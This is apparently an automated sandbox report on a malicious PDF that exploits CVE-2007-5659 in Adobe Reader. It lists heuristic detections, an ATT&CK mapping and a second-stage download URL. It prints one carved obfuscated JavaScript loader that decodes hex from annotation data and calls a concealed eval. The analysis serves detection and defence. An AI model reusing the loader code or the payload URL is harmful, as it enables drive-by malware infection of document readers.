MALICIOUS
Risk Score: 366

Malware Insights

MITRE ATT&CK:
- T1203 Exploitation for Client Execution
- T1059.007 JavaScript
This PDF sample contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script acts as a dropper: it decodes its payload with String.fromCharCode, gates execution on app.plugIns.length as an anti-analysis check, and finally downloads a second-stage payload from the embedded URL http://sosiskaptk.info/page/gold.php/n002102807r0007J0c000601R43329fdcXd351c909Y7530e03dZ03f01930.
Machine Learning
- Nyx PDF Classifier: malicious score 1.0000
Heuristics (10)

- Collab.collectEmailInfo — CVE-2007-5659 [critical; CVE exact; rule CVE_2007_5659]: PDF JavaScript calls Collab.collectEmailInfo. CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(), one of a series of Acrobat JS API exploits. (Identified after JavaScript deobfuscation.)
- JavaScript action [low; 5 related findings; rule PDF_JAVASCRIPT]: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) [high; CVE likely; rule PDF_JS_ADOBE_APSB08_13_PATCH_GATE]: PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1), the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
- PDF JavaScript exploit cluster [critical; rule PDF_JS_EXPLOIT_CLUSTER]: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
- Obfuscated multi-stage PDF JavaScript dropper [high; rule PDF_JS_OBFUSCATED_DROPPER]: PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers: OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
- PDF JavaScript shellcode contains an embedded download URL [high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL]: Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute routine (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream [low; rule PDF_JS]: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- ClamAV: Pdf.Exploit.Agent-35901 [critical; rule CLAMAV_DETECTION]: ClamAV detected this file as malware: Pdf.Exploit.Agent-35901.
- Suspicious extracted artifact [info; rule EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info; rule EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://sosiskaptk.info/page/gold.php/n002102807r0007J0c000601R43329fdcXd351c909Y7530e03dZ03f01930 (referenced by PDF JavaScript).
Extracted artifacts (3)
Files carved from inside the sample during analysis.

Artifact 1: javascript_obj0009_000.js
- Hash: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
- Kind: pdf-javascript-stream
- Source: PDF /JS object 9 at offset 0x43F6
- Size: 469 bytes
- Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token(s)).
- Preview script (first 1,000 lines of the extracted script):
var pr = null;
var fnc = 'ev';
var sum = '';
app.doc.syncAnnotScan();
if (app.plugIns.length != 0) {
    var num = 1;
    pr = app.doc.getAnnots({
        nPage: 0
    });
    sum = pr[num].subject;
}
var buf = "";
if (app.plugIns.length > 3) {
    fnc += 'a';
    var arr = sum.split(/-/);
    for (var i = 1; i < arr.length; i++) {
        buf += String.fromCharCode("0x"+arr[i]);
    }
    fnc += 'l';
}
if (app.plugIns.length >= 2)
{
    app[fnc]/**/(buf);
}

Artifact 2: legacy_pdfkit_stage_000.js
- Hash: 8c5aecf59bf78d8665cce80ba63be5f0aa3effb1488b4be41a329e6ebcf41da3
- Kind: deobfuscated-js
- Source: z-percent UTF-16BE base-21 decoded JavaScript at offset 0x1B07
- Size: 5371 bytes
- Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 5 eval/decoder/string-building token(s)).
- Preview script (first 1,000 lines of the extracted script; truncated in the report):

Artifact 3: deobfuscated.js
- Hash: 6fa32d8b583fbb0efd7c1bf4e16c2c2bd16e802e3fc7d5c6348d79e8c776512b
- Kind: deobfuscated-js
- Source: PDF JavaScript deobfuscation pass
- Size: 124269 bytes
- Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 4 eval/decoder/string-building token(s) and 2 long base64-like blob(s)).
- Preview script (first 1,000 lines of the extracted script): ... (truncated)